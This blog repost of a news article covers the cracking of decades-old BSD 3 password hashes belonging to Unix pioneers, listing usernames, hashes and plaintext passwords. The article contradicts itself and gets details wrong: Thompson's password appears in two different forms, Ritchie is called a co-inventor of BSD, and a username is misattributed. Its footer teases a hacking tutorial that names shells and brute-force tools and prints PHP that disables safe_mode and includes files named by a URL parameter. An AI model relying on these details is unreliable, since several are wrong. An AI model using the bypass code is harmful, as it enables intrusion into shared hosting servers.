Skip to main content

UNIX Co-Founder Ken Thompson's BSD Password Has Finally Been Hacked


A 39-year-old login password of Ken Thompson, the co-creator of the UNIX operating system among, has finally been cracked that belongs to a BSD-based system, one of the original versions of UNIX, which was back then used by various computer science pioneers.

In 2014, developer Leah Neukirchen spotted an interesting "/etc/passwd" file in a publicly available source tree of historian BSD version 3, which includes hashed passwords belonging to more than two dozens Unix luminaries who worked on UNIX development, including Dennis Ritchie, Stephen R. Bourne, Ken Thompson, Eric Schmidt, Stuart Feldman, and Brian W. Kernighan.

Since all passwords in that list are protected using now-depreciated DES-based crypt(3) algorithm and limited to at most 8 characters, Neukirchen decided to brute-force them for fun and successfully cracked passwords (listed below) for almost everyone using password cracking tools like John the Ripper and hashcat.


The ones that she wasn't able to crack belonged to Ken Thompson and five other contributors who helped build the Unix system, including Bill Joy, who later co-founded Sun Microsystems in 1986 and designed the Java programming language.

"Ken's password eluded my cracking endeavor. Even an exhaustive search over all lower-case letters and digits took several days (back in 2014) and yielded no result," she wrote in a blog post published Wednesday.

"I also realized that compared to other password hashing schemes (such as NTLM), crypt(3) turns out to be quite a bit slower to crack (and perhaps was also less optimized)."

All Passwords Have Finally Been Cracked, Except Just One!


Earlier this month, Neukirchen posted all her findings on the Unix Heritage Society mailing list and requested other members to help to crack the remaining passwords.

Just 6 days after that, Australian engineer Nigel Williams responded with the plaintext password of Thompson, the father of Unix, which he claimed to have cracked in over 4 days using "an AMD Radeon Vega64 running hashcat at about 930MH/s."

Thompson's password has been revealed as "p/q2-q4!a" — a notation in chess to describe the move "pawn from Queen's 2 to Queen's 4."

Just a day after Willians revealed Thompson's password, another mailing list member, Arthur Krewat, successfully cracked and provided the passwords for four more remaining uncracked hashes.

Here below we have listed plaintext passwords of all Unix luminaries, including their names, usernames and original hashed versions of their passwords:

Ken Thompson, co-inventor of Unix
  • Hashed → ZghOT0eRm4U9s
  • Plaintext → p/q2-q4!

Dennis Ritchie, co-inventor of BSD and creator of the C programming language
  • Hashed → gfVwhuAMF0Trw
  • Plaintext → dmac

Brian W. Kernighan, Canadian computer scientist and Unix contributor
  • Hashed → ymVglQZjbWYDE:
  • Plaintext → /.,/.,

Stephen R. Bourne, creator of the Bourne shell command line interpreter
  • Hashed → c8UdIntIZCUIA
  • Plaintext → bourne

Eric Schmidt, an early developer of Unix software and Former Google CEO:
  • Hashed → FH83PFo4z55cU
  • Plaintext → wendy!!!

Stuart Feldman, author of Unix automation tool make and the first Fortran compiler
  • Hashed → IIVxQSvq1V9R2
  • Plaintext → axolotl

Here's a list of cracked passwords belonging to other computer science pioneers:

PersonUsernameHashesPlaintext password
Mark HortonmarkPb1AmSpsVPG0Yuio
Kirk McKusickmckusickAAZk9Aj5/Ue0Efoobar
Richard FatemanfatemanE9i8fWghn1p/Iapr1744
Runs a program, not a login shellnetwork9EZLtSYjeEABEnetwork
UNIX-to-UNIX CopyuucpP0CHBwE/mB51kwhatnot
Peter KesslerpeterNc3IkFJyW2u7E...hello
Kurt ShoenskurtolqH1vDqH38awsacristy
Brian W. Kernighanjkf9ULn5cWTc0b9Esherril.
Peter J. WeinbergerpjwN33.MCNcTh5Qwuucpuucp
Ernie Co-vaxrootOVCPatZ8RFmFYcowperso
John ReiserjfrX.ZNnZrciWauE5%ghj
Steve JohnsonscjIL2bmGECQJgbkpdq;dq
Bob Kridlekridle4BkcEieEtjWXIjilland1
Keith Sklowersklower8PYh/dUBQT9Sstheik!!!
Robert Henryhenrylj1vXnxTAPnDcsn74193n
Howard Katseffhpk9ycwM8mmmcp4Qgraduat;
Özalp Babaoğluozalpm5syt3.lB5LAE12ucdort
Bob Fabryfabryd9B17PTU2RTlM561cml..
Tom LondontblcBWEbG59spEmM..pnn521

Until now, all members in the list that Neukirchen found have had their passwords cracked except Bill Joy, whose username is bill and hashed password is ".2xvLVqGHJm8M"
Source :The Hacker News

Comments

Popular posts from this blog

10 Best Forum Software For Webmasters

10 Best Forum Software For Webmasters Do you want to create your online discussion forum or online community where people can discuss about their favorite topics? In this article, you can see 10 best forum software (scripts for setting up discussion forums) that can be used free of cost. Although some scripts are paid but rest of these forum scripts are free to use.You only need to buy hosting space and domain name for your website and after then you can install any of these forum scripts to start your own discussion forums on the internet. Online discussion forums generate huge page views because thousands of people want to join online discussion forums to ask questions or share knowledge. Some of online marketers join forums to discuss about their products with community members. You don't need to acquire any kind of technical skill to run a professional discussion forums because these days, almost all web hosting providers offer one click script installer which h...

How to Hack WhatsApp using just a GIF

A picture is worth a thousand words, but a GIF is worth a thousand pictures. Today, the short looping clips, GIFs are everywhere—on your social media, on your message boards, on your chats, helping users perfectly express their emotions, making people laugh, and reliving a highlight. But what if an innocent-looking GIF greeting with Good morning, Happy Birthday, or Merry Christmas message hacks your smartphone? Well, not a theoretical idea anymore. WhatsApp has recently patched a critical security vulnerability in its app for Android, which remained unpatched for at least 3 months after being discovered, and if exploited, could have allowed remote hackers to compromise Android devices and potentially steal files and chat messages. WhatsApp Remote Code Execution Vulnerability The vulnerability, tracked as  CVE-2019-11932 , is a double-free memory corruption bug that doesn't actually reside in the WhatsApp code itself, but in an open-source GIF image parsing library that What...

|Bypass Symlink on 2013 Server With Different .htaccess and Methods by Sen Haxor |

Hi, Guys,  Please a wonderfull tutorial provided bt Sem;\  Today I gonna Explain how to bypass Symlink on 2013 Server With Different .htaccess and Methods. So let's Get Started :) Note: This method is not applicable for Godaddy, Bluehost, Hostgator and Hostmonstor Servers. For This First You Need the Following Files : 1 -> Sen Haxor CGI Shell 2 -> sen.zip 3 -> passwd-bypass.php 4 -> Turbo Brute force Cpanel 5 - > Port.py First Before Starting to symlink we need to create php.ini and ini.php to Disable Safe mode and Disabled Functions on the server . Use the Following Code : Make a php.ini with the following code safe_mode=Off And ini.php with <? echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["file"]); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo...